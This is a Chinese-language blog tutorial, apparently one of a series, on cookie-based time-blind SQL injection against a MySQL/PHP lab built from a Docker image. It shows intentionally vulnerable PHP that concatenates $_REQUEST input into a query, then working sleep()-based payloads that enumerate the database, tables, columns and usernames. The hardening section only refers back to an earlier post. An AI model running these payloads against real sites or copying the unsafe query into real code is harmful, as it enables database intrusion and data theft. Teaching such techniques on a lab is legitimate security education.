<!DOCTYPE html>












  


<html class="theme-next muse use-motion" lang>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">

<link rel="stylesheet" href="/css/main.css?v=7.1.2">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.1.2">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.1.2">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.1.2">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.2" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.1.2',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: false,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="声明：本文仅供交流学习使用，严禁利用所学技术违法犯罪，否则后果自负    总结一下sql注入，这个是通过cookie注入并且是用时间盲注">
<meta name="keywords" content="web安全,sql注入,mysql">
<meta property="og:type" content="article">
<meta property="og:title" content="03,sql注入专题之mysql的cookie基于时间盲注入及其加固">
<meta property="og:url" content="http://www.duwentao.top/2019/01/07/03,SQL注入之cookie注入基于时间盲注/index.html">
<meta property="og:site_name" content="D&#39;Blog">
<meta property="og:description" content="声明：本文仅供交流学习使用，严禁利用所学技术违法犯罪，否则后果自负    总结一下sql注入，这个是通过cookie注入并且是用时间盲注">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://www.duwentao.top/images/sql%E6%B3%A8%E5%85%A5%E4%B8%93%E9%A2%98/03%EF%BC%8Ccookie%E6%B3%A8%E5%85%A5/image-20190108172234369-6939354.png">
<meta property="og:image" content="http://www.duwentao.top/images/sql%E6%B3%A8%E5%85%A5%E4%B8%93%E9%A2%98/03%EF%BC%8Ccookie%E6%B3%A8%E5%85%A5/image-20190108180530105-6941930.png">
<meta property="og:image" content="http://www.duwentao.top/images/sql%E6%B3%A8%E5%85%A5%E4%B8%93%E9%A2%98/03%EF%BC%8Ccookie%E6%B3%A8%E5%85%A5/image-20190108233413904-6961653.png">
<meta property="og:image" content="http://www.duwentao.top/images/sql%E6%B3%A8%E5%85%A5%E4%B8%93%E9%A2%98/03%EF%BC%8Ccookie%E6%B3%A8%E5%85%A5/image-20190108233709357-6961829.png">
<meta property="og:image" content="http://www.duwentao.top/images/sql%E6%B3%A8%E5%85%A5%E4%B8%93%E9%A2%98/03%EF%BC%8Ccookie%E6%B3%A8%E5%85%A5/image-20190108234150174-6962110.png">
<meta property="og:image" content="http://www.duwentao.top/images/sql%E6%B3%A8%E5%85%A5%E4%B8%93%E9%A2%98/03%EF%BC%8Ccookie%E6%B3%A8%E5%85%A5/image-20190108234602091-6962362.png">
<meta property="og:image" content="http://www.duwentao.top/images/sql%E6%B3%A8%E5%85%A5%E4%B8%93%E9%A2%98/03%EF%BC%8Ccookie%E6%B3%A8%E5%85%A5/image-20190108234746916-6962466.png">
<meta property="og:updated_time" content="2019-01-09T15:29:08.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="03,sql注入专题之mysql的cookie基于时间盲注入及其加固">
<meta name="twitter:description" content="声明：本文仅供交流学习使用，严禁利用所学技术违法犯罪，否则后果自负    总结一下sql注入，这个是通过cookie注入并且是用时间盲注">
<meta name="twitter:image" content="http://www.duwentao.top/images/sql%E6%B3%A8%E5%85%A5%E4%B8%93%E9%A2%98/03%EF%BC%8Ccookie%E6%B3%A8%E5%85%A5/image-20190108172234369-6939354.png">





  
  
  <link rel="canonical" href="http://www.duwentao.top/2019/01/07/03,SQL注入之cookie注入基于时间盲注/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>03,sql注入专题之mysql的cookie基于时间盲注入及其加固 | D'Blog</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">D'Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>About</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>Tags</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>

  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://www.duwentao.top/2019/01/07/03,SQL注入之cookie注入基于时间盲注/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="杜文涛">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="D'Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">03,sql注入专题之mysql的cookie基于时间盲注入及其加固

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2019-01-07 00:00:00" itemprop="dateCreated datePublished" datetime="2019-01-07T00:00:00+08:00">2019-01-07</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Modified: 2019-01-09 23:29:08" itemprop="dateModified" datetime="2019-01-09T23:29:08+08:00">2019-01-09</time>
              
            
          </span>

          

          
            
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <html><body style="padding: 20px;"><marquee><span style="font-weight: bolder;font-size: 20px;color: red;"><a href="https://www.youtube.com/channel/UCiO_qNDegcpV4cUhkFc22lA?view_as=subscriber" target="_blank" rel="noopener"><font color="red">声明：本文仅供交流学习使用，严禁利用所学技术违法犯罪，否则后果自负</font></a></span></marquee></body></html>



<p>总结一下sql注入，这个是通过cookie注入并且是用时间盲注</p>
<a id="more"></a>



<h2 id="一，环境部署"><a href="#一，环境部署" class="headerlink" title="一，环境部署"></a>一，环境部署</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker pull duwentao/sql-injection:3.0</span><br></pre></td></tr></table></figure>

<h2 id="二，存在漏洞核心代码"><a href="#二，存在漏洞核心代码" class="headerlink" title="二，存在漏洞核心代码"></a>二，存在漏洞核心代码</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">$username = $_REQUEST[<span class="string">"username"</span>];</span><br><span class="line">$password = $_REQUEST[<span class="string">"password"</span>];</span><br><span class="line"></span><br><span class="line">$db -&gt; set_charset(<span class="string">'utf8'</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">$sql = <span class="string">"select password from users where username=\"&#123;$username&#125;\""</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;font color = \"red\"&gt;你当前执行的语句是:"</span>.$sql.<span class="string">"&lt;/font&gt;&lt;br&gt;&lt;br&gt;"</span>;</span><br><span class="line"></span><br><span class="line">$reslut = $db-&gt;query($sql);</span><br><span class="line"><span class="comment">//$res =$reslut-&gt;fetch_row();</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"good"</span>;</span><br></pre></td></tr></table></figure>

<p>上面这个代码是我们上一篇文章加固的代码，这个代码用上一种盲注肯定注入不了，我们一起探讨一下用其他方式是不是可以注入。</p>
<h2 id="三，探讨cookie传参"><a href="#三，探讨cookie传参" class="headerlink" title="三，探讨cookie传参"></a>三，探讨cookie传参</h2><p>我们从核心代码里可以看到有个</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$username = $_REQUEST[<span class="string">"username"</span>];</span><br><span class="line">$password = $_REQUEST[<span class="string">"password"</span>];</span><br></pre></td></tr></table></figure>

<p>$_REQUEST这个变量是即可以接收get，post传输的值，也可以接收cookie传的值，但是在php.ini里需要满足下面的要求,把682行修改成如下图所示的样子即可以接收cookie的值</p>
<p><img src="/../images/sql%E6%B3%A8%E5%85%A5%E4%B8%93%E9%A2%98/03%EF%BC%8Ccookie%E6%B3%A8%E5%85%A5/image-20190108172234369-6939354.png" alt="image-20190108172234369"></p>
<p>用cookie穿参验证</p>
<p><img src="/../images/sql%E6%B3%A8%E5%85%A5%E4%B8%93%E9%A2%98/03%EF%BC%8Ccookie%E6%B3%A8%E5%85%A5/image-20190108180530105-6941930.png" alt="image-20190108180530105"></p>
<h2 id="四，开始注入"><a href="#四，开始注入" class="headerlink" title="四，开始注入"></a>四，开始注入</h2><p>1,验证注入点是否存在</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and sleep(5)</span><br></pre></td></tr></table></figure>

<p><img src="/../images/sql%E6%B3%A8%E5%85%A5%E4%B8%93%E9%A2%98/03%EF%BC%8Ccookie%E6%B3%A8%E5%85%A5/image-20190108233413904-6961653.png" alt="image-20190108233413904"></p>
<p>2，查询当前使用的数据库，找到数据库sqltest</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=admin" and if(mid(database(),1,1)="s",sleep(5),1)<span class="comment">#;password=sss</span></span><br></pre></td></tr></table></figure>

<p><img src="/../images/sql%E6%B3%A8%E5%85%A5%E4%B8%93%E9%A2%98/03%EF%BC%8Ccookie%E6%B3%A8%E5%85%A5/image-20190108233709357-6961829.png" alt="image-20190108233709357"></p>
<p>3，查询数据库里的表</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=admin" and if(ascii(mid((<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="string">'sqltest'</span> <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)) = <span class="number">117</span>,<span class="keyword">sleep</span>(<span class="number">5</span>),<span class="number">1</span>)<span class="comment">#;password=sss</span></span><br></pre></td></tr></table></figure>

<p><img src="/../images/sql%E6%B3%A8%E5%85%A5%E4%B8%93%E9%A2%98/03%EF%BC%8Ccookie%E6%B3%A8%E5%85%A5/image-20190108234150174-6962110.png" alt="image-20190108234150174"></p>
<p>4，最终找到表是“users”和“news”</p>
<p>5，查users表里的列（id，username，password）</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=admin" and if(ascii(mid((<span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name = <span class="string">'users'</span> <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>))=<span class="string">"117"</span> ,<span class="keyword">sleep</span>(<span class="number">5</span>),<span class="number">1</span>)<span class="comment">#;password=sss</span></span><br></pre></td></tr></table></figure>

<p><img src="/../images/sql%E6%B3%A8%E5%85%A5%E4%B8%93%E9%A2%98/03%EF%BC%8Ccookie%E6%B3%A8%E5%85%A5/image-20190108234602091-6962362.png" alt="image-20190108234602091"></p>
<p>6，查数据</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=admin" and if(ascii(substring((<span class="keyword">select</span> username <span class="keyword">from</span> sqltest.users <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>))=<span class="string">"97"</span> ,<span class="keyword">sleep</span>(<span class="number">5</span>),<span class="number">1</span>)<span class="comment">#;password=sss</span></span><br></pre></td></tr></table></figure>

<p><img src="/../images/sql%E6%B3%A8%E5%85%A5%E4%B8%93%E9%A2%98/03%EF%BC%8Ccookie%E6%B3%A8%E5%85%A5/image-20190108234746916-6962466.png" alt="image-20190108234746916"></p>
<h2 id="五，加固"><a href="#五，加固" class="headerlink" title="五，加固"></a>五，加固</h2><p>同上一篇文章</p>
<h2 id="六，视频演示"><a href="#六，视频演示" class="headerlink" title="六，视频演示"></a>六，视频演示</h2><iframe width="560" height="315" src="https://www.youtube.com/embed/SCWtHAvim3c" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>



<h2 id="七，sql注入拓展"><a href="#七，sql注入拓展" class="headerlink" title="七，sql注入拓展"></a>七，sql注入拓展</h2><p>1，$_REQUEST接收从get，post，cookie传的值。</p>
<p>2，if（第一条语句，第二条语句，第三条语句）</p>
<p>​    1), 如果第一条为真，则执行第二条.</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select if(1,2,3);</span><br><span class="line"><span class="comment">--------------</span></span><br><span class="line"><span class="keyword">select</span> <span class="keyword">if</span>(<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>)</span><br><span class="line"><span class="comment">--------------</span></span><br><span class="line"></span><br><span class="line">+<span class="comment">-----------+</span></span><br><span class="line">| <span class="keyword">if</span>(<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>) |</span><br><span class="line">+<span class="comment">-----------+</span></span><br><span class="line">|         <span class="number">2</span> |</span><br><span class="line">+<span class="comment">-----------+</span></span><br><span class="line"><span class="number">1</span> <span class="keyword">row</span> <span class="keyword">in</span> <span class="keyword">set</span> (<span class="number">0.00</span> sec)</span><br></pre></td></tr></table></figure>

<p>​    2),如果第一条不为真，则执行第三条</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select if(0,2,3);</span><br><span class="line"><span class="comment">--------------</span></span><br><span class="line"><span class="keyword">select</span> <span class="keyword">if</span>(<span class="number">0</span>,<span class="number">2</span>,<span class="number">3</span>)</span><br><span class="line"><span class="comment">--------------</span></span><br><span class="line"></span><br><span class="line">+<span class="comment">-----------+</span></span><br><span class="line">| <span class="keyword">if</span>(<span class="number">0</span>,<span class="number">2</span>,<span class="number">3</span>) |</span><br><span class="line">+<span class="comment">-----------+</span></span><br><span class="line">|         <span class="number">3</span> |</span><br><span class="line">+<span class="comment">-----------+</span></span><br><span class="line"><span class="number">1</span> <span class="keyword">row</span> <span class="keyword">in</span> <span class="keyword">set</span> (<span class="number">0.00</span> sec)</span><br></pre></td></tr></table></figure>

<p>3,sleep函数是延时</p>
<p>如果语句正确，则延时输出，如果语句错误则直接报错</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select version(),sleep(5); </span><br><span class="line"><span class="comment">--------------</span></span><br><span class="line"><span class="keyword">select</span> <span class="keyword">version</span>(),<span class="keyword">sleep</span>(<span class="number">5</span>)</span><br><span class="line"><span class="comment">--------------</span></span><br><span class="line"></span><br><span class="line">+<span class="comment">-----------+----------+</span></span><br><span class="line">| <span class="keyword">version</span>() | <span class="keyword">sleep</span>(<span class="number">5</span>) |</span><br><span class="line">+<span class="comment">-----------+----------+</span></span><br><span class="line">| <span class="number">5.1</span><span class="number">.73</span>    |        <span class="number">0</span> |</span><br><span class="line">+<span class="comment">-----------+----------+</span></span><br><span class="line"><span class="number">1</span> <span class="keyword">row</span> <span class="keyword">in</span> <span class="keyword">set</span> (<span class="number">5.00</span> sec)</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select ve(),sleep(5);     </span><br><span class="line">--------------</span><br><span class="line">select ve(),sleep(5)</span><br><span class="line">--------------</span><br><span class="line"></span><br><span class="line">ERROR 1305 (42000): FUNCTION sqltest.ve does not exist</span><br><span class="line">mysql&gt;</span><br></pre></td></tr></table></figure>


      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      
        
          
        
        <div class="post-tags">
          
            <a href="/tags/web安全/" rel="tag"># web安全</a>
          
            <a href="/tags/sql注入/" rel="tag"># sql注入</a>
          
            <a href="/tags/mysql/" rel="tag"># mysql</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/01/05/01,sql注入专题之普通get型注入/" rel="next" title="01,sql注入专题之mysql的GET型注入及其加固">
                <i class="fa fa-chevron-left"></i> 01,sql注入专题之mysql的GET型注入及其加固
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/01/07/02,SQL注入之POST注入盲注/" rel="prev" title="02,sql注入专题之mysql的POST型盲注入及其加固">
                02,sql注入专题之mysql的POST型盲注入及其加固 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">杜文涛</p>
              <div class="site-description motion-element" itemprop="description"></div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">31</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">37</span>
                    <span class="site-state-item-name">tags</span>
                  
                </div>
              
            </nav>
          

          

          

          

          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.51cto.com/tdcqvip" title="http://blog.51cto.com/tdcqvip" rel="noopener" target="_blank">愿博客地址</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.youtube.com/channel/UCiO_qNDegcpV4cUhkFc22lA?view_as=subscriber" title="https://www.youtube.com/channel/UCiO_qNDegcpV4cUhkFc22lA?view_as=subscriber" rel="noopener" target="_blank">订阅频道</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://xj.hk/" title="https://xj.hk/" rel="noopener" target="_blank">导航网</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://y4er.com/" title="https://y4er.com/" rel="noopener" target="_blank">y4er</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://phpinfo.me" title="https://phpinfo.me" rel="noopener" target="_blank">Lcy</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://paper.seebug.org" title="https://paper.seebug.org" rel="noopener" target="_blank">seebug</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#一，环境部署"><span class="nav-number">1.</span> <span class="nav-text">一，环境部署</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二，存在漏洞核心代码"><span class="nav-number">2.</span> <span class="nav-text">二，存在漏洞核心代码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#三，探讨cookie传参"><span class="nav-number">3.</span> <span class="nav-text">三，探讨cookie传参</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#四，开始注入"><span class="nav-number">4.</span> <span class="nav-text">四，开始注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#五，加固"><span class="nav-number">5.</span> <span class="nav-text">五，加固</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#六，视频演示"><span class="nav-number">6.</span> <span class="nav-text">六，视频演示</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#七，sql注入拓展"><span class="nav-number">7.</span> <span class="nav-text">七，sql注入拓展</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">杜文涛</span>

  

  
</div>


  <div class="powered-by">Powered by <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.1.2</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=3.4.1"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/utils.js?v=7.1.2"></script>

  <script src="/js/motion.js?v=7.1.2"></script>



  
  


  <script src="/js/schemes/muse.js?v=7.1.2"></script>



  
  <script src="/js/scrollspy.js?v=7.1.2"></script>
<script src="/js/post-details.js?v=7.1.2"></script>



  


  <script src="/js/next-boot.js?v=7.1.2"></script>


  

  

  

  


  


  




  

  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
